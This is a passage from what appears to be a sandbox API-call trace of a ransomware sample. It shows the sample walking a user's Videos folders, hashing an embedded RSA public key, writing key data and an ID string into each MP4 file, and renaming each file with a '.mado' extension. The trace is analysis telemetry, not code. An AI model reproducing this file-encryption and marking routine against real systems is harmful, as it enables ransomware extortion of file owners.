lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.622] CloseHandle (hObject=0x63c) returned 1 [0205.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eed98 [0205.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0205.623] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\N3-Ofl.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\n3-ofl.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\N3-Ofl.mp4.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\n3-ofl.mp4.mado")) returned 1 [0205.625] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20a77ad0, ftCreationTime.dwHighDateTime=0x1d5e3aa, ftLastAccessTime.dwLowDateTime=0x539804b0, ftLastAccessTime.dwHighDateTime=0x1d5da53, ftLastWriteTime.dwLowDateTime=0x539804b0, ftLastWriteTime.dwHighDateTime=0x1d5da53, nFileSizeHigh=0x0, nFileSizeLow=0x12ac6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oh4Bur3C-KwDfYR.mp4", cAlternateFileName="OH4BUR~1.MP4")) returned 1 [0205.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d6360 [0205.625] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\Oh4Bur3C-KwDfYR.mp4") returned=".mp4" [0205.625] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\Oh4Bur3C-KwDfYR.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\oh4bur3c-kwdfyr.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.625] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=76486) returned 1 [0205.625] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.627] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x12aa0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.628] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.629] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x12ac6, lpOverlapped=0x0) returned 1 [0205.630] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.630] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.630] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.630] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0205.631] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.631] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.631] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.631] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.631] GetLastError () returned 0x0 [0205.631] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.631] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0205.631] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.631] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.631] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.631] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.632] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x12ac6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.632] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.632] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.632] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.632] CloseHandle (hObject=0x63c) returned 1 [0205.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b74e80 [0205.633] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\Oh4Bur3C-KwDfYR.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\oh4bur3c-kwdfyr.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\Oh4Bur3C-KwDfYR.mp4.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\oh4bur3c-kwdfyr.mp4.mado")) returned 1 [0205.635] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20a77ad0, ftCreationTime.dwHighDateTime=0x1d5e3aa, ftLastAccessTime.dwLowDateTime=0x539804b0, ftLastAccessTime.dwHighDateTime=0x1d5da53, ftLastWriteTime.dwLowDateTime=0x539804b0, ftLastWriteTime.dwHighDateTime=0x1d5da53, nFileSizeHigh=0x0, nFileSizeLow=0x12ac6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oh4Bur3C-KwDfYR.mp4", cAlternateFileName="OH4BUR~1.MP4")) returned 0 [0205.635] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0205.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0205.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.635] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67258 [0205.635] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0205.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.638] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\") returned="biDMIzVx5WSAFsePg\\" [0205.638] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0205.638] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.638] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.638] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.638] PathFindFileNameW (pszPath="") returned="" [0205.638] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x188398a0, ftCreationTime.dwHighDateTime=0x1d5da1a, ftLastAccessTime.dwLowDateTime=0x9f6ccd0, ftLastAccessTime.dwHighDateTime=0x1d5db55, ftLastWriteTime.dwLowDateTime=0x9f6ccd0, ftLastWriteTime.dwHighDateTime=0x1d5db55, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0205.638] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x188398a0, ftCreationTime.dwHighDateTime=0x1d5da1a, ftLastAccessTime.dwLowDateTime=0x9f6ccd0, ftLastAccessTime.dwHighDateTime=0x1d5db55, ftLastWriteTime.dwLowDateTime=0x9f6ccd0, ftLastWriteTime.dwHighDateTime=0x1d5db55, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.639] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc1c410, ftCreationTime.dwHighDateTime=0x1d5da0c, ftLastAccessTime.dwLowDateTime=0x8682d150, ftLastAccessTime.dwHighDateTime=0x1d5e257, ftLastWriteTime.dwLowDateTime=0x8682d150, ftLastWriteTime.dwHighDateTime=0x1d5e257, nFileSizeHigh=0x0, nFileSizeLow=0x893c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="O_HU25N0PZDyPsCApD9e.mp4", cAlternateFileName="O_HU25~1.MP4")) returned 1 [0205.639] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\O_HU25N0PZDyPsCApD9e.mp4") returned=".mp4" [0205.639] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\biDMIzVx5WSAFsePg\\O_HU25N0PZDyPsCApD9e.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bidmizvx5wsafsepg\\o_hu25n0pzdypscapd9e.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.639] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=35132) returned 1 [0205.639] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.641] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x8916, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.641] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.643] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x893c, lpOverlapped=0x0) returned 1 [0205.643] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.643] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.643] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.643] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321af0) returned 1 [0205.644] CryptCreateHash (in: hProv=0x321af0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.644] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.644] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, 